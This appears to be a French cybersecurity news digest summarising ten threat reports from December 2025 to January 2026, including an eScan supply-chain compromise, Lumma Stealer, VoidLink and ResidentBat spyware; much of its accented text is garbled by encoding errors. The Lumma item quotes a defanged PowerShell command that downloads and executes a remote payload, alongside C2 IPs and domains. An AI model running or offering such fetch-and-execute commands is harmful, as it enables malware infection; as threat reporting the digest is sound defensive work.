Compromission de la chaüne d’approvisionnement d’eScan : mises à jour malveillantes et IOCs

Source et contexte: Morphisec Threat Labs publie un bulletin d’alerte dĂ©taillant une compromission de la chaĂźne d’approvisionnement d’eScan (MicroWorld Technologies) identifiĂ©e le 20 janvier 2026, oĂč des mises Ă  jour lĂ©gitimes ont distribuĂ© un malware multi‑étapes Ă  l’échelle mondiale. ‱ Chronologie: Le 20/01, un package de mise Ă  jour malveillant est diffusĂ© via l’infrastructure d’update d’eScan et Morphisec bloque l’activitĂ© chez ses clients. Le 21/01, Morphisec contacte eScan. eScan indique avoir dĂ©tectĂ© l’incident par supervision interne, isolĂ© l’infrastructure affectĂ©e en 1 h et mis hors ligne le systĂšme de mises Ă  jour global pendant plus de 8 h. AprĂšs l’incident, la plupart des clients Morphisec ont dĂ» contacter proactivement eScan pour obtenir la remĂ©diation. ...

29 janvier 2026 Â· 3 min

OpenMalleableC2 : implémentation open source du Malleable C2 de Cobalt Strike

Selon l’annonce du projet OpenMalleableC2, cette bibliothĂšque open source implĂ©mente le format de profil Malleable C2 de Cobalt Strike pour transformer et transporter des donnĂ©es sur HTTP de maniĂšre flexible et transparente. Le projet vise Ă  combler les limites de personnalisation du trafic HTTP observĂ©es dans des frameworks C2 open source existants (comme Mythic, Havoc, Adaptix) en permettant la rĂ©utilisation directe des profils Malleable C2 et de l’écosystĂšme associĂ©. Il se prĂ©sente comme « framework-agnostic » afin de s’intĂ©grer Ă  divers outils de recherche et d’équipes rouges. đŸ› ïž ...

29 janvier 2026 Â· 2 min

Cartographie de 18 000+ serveurs C2 malveillants au sein des FAI et clouds chinois

Selon Hunt.io, une analyse « host-centric » sur trois mois a mis au jour plus de 18 000 serveurs de commande et contrĂŽle (C2) actifs rĂ©partis sur 48 fournisseurs d’infrastructure en Chine, montrant une forte concentration de l’abus sur quelques grands FAI et clouds. ‱ Panorama quantitatif. L’étude recense 21 629 artefacts malveillants, dont 18 130 C2 (~84%), 2 837 sites de phishing (~13%), 528 rĂ©pertoires ouverts et 134 IOCs publics. China Unicom concentre prĂšs de la moitiĂ© des C2 (≈9 100), devant Alibaba Cloud et Tencent (~3 300 chacun). Les rĂ©seaux de confiance Ă©levĂ©s comme China169 Backbone, CHINANET et CERNET sont activement abusĂ©s. ...

19 janvier 2026 Â· 4 min

VoidLink : framework malware cloud-first pour Linux, modulaire et furtif

Selon Check Point Research, VoidLink est un framework malware « cloud-first » pour Linux, repĂ©rĂ© en dĂ©cembre 2025, en cours d’évolution rapide et attribuĂ© Ă  des dĂ©veloppeurs affiliĂ©s Ă  la Chine (affiliation exacte incertaine). Les Ă©chantillons observĂ©s contiennent des artefacts de dĂ©veloppement, une architecture modulaire ambitieuse et une documentation suggĂ©rant un usage commercial potentiel, sans preuve d’infections en conditions rĂ©elles Ă  la date de publication. ‱ Vue d’ensemble đŸ§â˜ïž: VoidLink est un implant Ă©crit en Zig, pensĂ© pour les environnements modernes (AWS, GCP, Azure, Alibaba, Tencent) et capable de dĂ©tecter Docker/Kubernetes pour adapter son comportement. Il collecte des mĂ©tadonnĂ©es cloud, profile le systĂšme/hyperviseur et cible aussi des Ă©lĂ©ments tels que les identifiants de dĂ©pĂŽt Git, indiquant un intĂ©rĂȘt possible pour les postes d’ingĂ©nieurs et la chaĂźne d’approvisionnement. Objectif principal: accĂšs furtif et durable, surveillance et exfiltration de donnĂ©es. ...

17 janvier 2026 Â· 4 min

Lumen/Black Lotus Labs perturbe les botnets DDoS Aisuru et Kimwolf en neutralisant 550+ serveurs C2

Selon Black Lotus Labs (Lumen Technologies), l’opĂ©rateur a observĂ© fin 2025 une croissance fulgurante du botnet Aisuru (jusqu’à >11 Tbps), puis l’apparition d’un nouveau botnet Kimwolf, alimentĂ© par l’exploitation de services de proxy rĂ©sidentiel. Lumen dĂ©crit ses actions de disruption (null-routing) ayant permis de neutraliser plus de 550 serveurs C2. — Contexte et montĂ©e en puissance — En septembre 2025, Aisuru passe d’environ 50 000 Ă  200 000 bots/jour, corrĂ©lĂ© Ă  des attaques records (>11 Tbps). Un backend C2 d’Aisuru (65.108.5[.]46) agit comme entonnoir de trafic depuis les C2 confirmĂ©s. Des connexions SSH depuis des IP canadiennes vers 194.46.59[.]169 (proxy-sdk.14emeliaterracewestroxburyma02132[.]su) suggĂšrent une interface de contrĂŽle. Le backend adopte ensuite le domaine client.14emeliaterracewestroxburyma02132[.]su. — Bifurcation vers Kimwolf — ...

16 janvier 2026 Â· 3 min

Lumma Stealer multiplie les tùches planifiées et accroßt le trafic C2 vers fileless-market[.]cc

Source: billet signĂ© par Brad Duncan (publiĂ© le 14 janvier 2026). Contexte: l’auteur documente en laboratoire un exemple d’infection Lumma Stealer prĂ©sentant un comportement post-infection inhabituel qui gĂ©nĂšre une hausse continue de trafic vers un mĂȘme domaine C2. AprĂšs l’exfiltration des donnĂ©es par Lumma Stealer, l’hĂŽte Windows infectĂ© rĂ©cupĂšre des instructions depuis un lien Pastebin (hxxps[:]//pastebin[.]com/raw/xRmmdinT) utilisĂ©es pour une infection de suivi. Le contenu Pastebin renvoie une commande PowerShell: irm hxxps[:]//fileless-market[.]cc/Notes.pdf | iex, entraĂźnant des requĂȘtes HTTPS rĂ©pĂ©tĂ©es vers hxxps[:]//fileless-market[.]cc/. ...

16 janvier 2026 Â· 2 min

ResidentBat : nouveau spyware Android attribué au KGB biélorusse installé via accÚs physique

Selon RSF Digital Security Lab (Reporters sans frontiĂšres), en collaboration avec RESIDENT.NGO et avec un appui d’Amnesty International Security Lab, un nouveau spyware Android nommĂ© « ResidentBat » a Ă©tĂ© mis au jour aprĂšs l’infection du tĂ©lĂ©phone d’un journaliste biĂ©lorusse au T3 2025, consĂ©cutive Ă  une saisie par le KGB. ‱ Le spyware, empaquetĂ© en APK et installĂ© via accĂšs physique (pas d’exploits), abuse de permissions Ă©tendues et d’un service d’accessibilitĂ© pour collecter des SMS, appels entrants/sortants (avec enregistrement d’appels), fichiers, photos/vidĂ©os, microphone, captures d’écran/vidĂ©o (MediaProjection), presse-papiers (jusqu’à Android 10), localisation, notifications et contenus d’apps (messageries comme Telegram, Viber, Skype, VK, Signal, WhatsApp, etc.). Il se dĂ©clare Device Admin, peut verrouiller ou effacer l’appareil, et persiste en service au premier plan. ...

18 dĂ©cembre 2025 Â· 4 min

Censys dissĂšque l’infrastructure C2 de DDoSia (NoName057(16)) et son Ă©volution post‑Eastwood

Source : Censys (blog, 15 dĂ©c. 2025). Le billet de Silas Cutler enquĂȘte sur l’infrastructure derriĂšre les attaques de DDoSia, outil DDoS participatif opĂ©rĂ© par le groupe pro-russe NoName057(16), et documente son fonctionnement, son ciblage, ainsi que les effets de la perturbation par les forces de l’ordre en juillet 2025. ‱ Contexte et mode opĂ©ratoire DDoSia, lancĂ© en mars 2022 sur Telegram, est un outil de dĂ©ni de service distribuĂ© s’appuyant sur des volontaires (ordinateurs personnels, serveurs louĂ©s, hĂŽtes compromis). La distribution passe par des binaires Golang multi-plateformes (le nom interne « Go‑Stresser » est mentionnĂ©), avec des versions historiques Python. Des liens OSINT suggĂšrent un prĂ©dĂ©cesseur possible via le malware Bobik (2020). Les volontaires ne choisissent pas les cibles ; la motivation est entretenue par des rĂ©compenses financiĂšres et une propagande pro‑Russie sur Telegram. ...

17 dĂ©cembre 2025 Â· 3 min

Abus de Telegram par des malwares : exfiltration, C2 et détection (NVISO)

Source: NVISO – Depuis octobre 2025, le SOC de NVISO a observĂ© quatre tentatives d’intrusion exploitant Telegram, et propose une analyse des modes d’abus de la plateforme ainsi que des pistes concrĂštes de dĂ©tection et de chasse. ‱ Fonctionnement et abus de Telegram: la messagerie cloud, ses bots (créés via @BotFather) et ses canaux sont dĂ©tournĂ©s pour leurs avantages opĂ©rationnels. Des malwares intĂšgrent des bot tokens et chat/channel IDs, et appellent des endpoints clĂ©s comme /getMe, /sendMessage, /sendDocument, /getUpdates, /getWebhookInfo et /deleteWebhook (dont /deleteWebhook?drop_pending_updates=true pour purger l’historique des commandes), afin d’assurer fiabilitĂ©, anonymat et rĂ©silience cĂŽtĂ© attaquant. ...

16 dĂ©cembre 2025 Â· 3 min

Un rĂ©seau massif de jeux d’argent sert aussi d’infrastructure C2 et d’anonymat

Selon Help Net Security, des chercheurs de Malanta dĂ©crivent une opĂ©ration de longue durĂ©e qui combine jeux d’argent illicites, distribution de malwares et dĂ©tournement d’infrastructures lĂ©gitimes pour fournir une infrastructure de commande et contrĂŽle (C2) et des services d’anonymat. L’opĂ©ration, en activitĂ© depuis au moins 14 ans, cible notamment des internautes en IndonĂ©sie et exploite des sous-domaines d’entitĂ©s gouvernementales et d’entreprises. L’ampleur est majeure: 328 039 domaines au total, dont 236 433 domaines achetĂ©s, 90 125 sites piratĂ©s et 1 481 sous-domaines dĂ©tournĂ©s. Les chercheurs relient Ă©galement des milliers d’applications Android malveillantes, 38 comptes GitHub hĂ©bergeant des web-shells, modĂšles et artefacts de staging, ainsi que 500+ domaines typosquattĂ©s se faisant passer pour des organisations populaires. ...

6 dĂ©cembre 2025 Â· 3 min
Derniùre mise à jour le: 8 Feb 2026 📝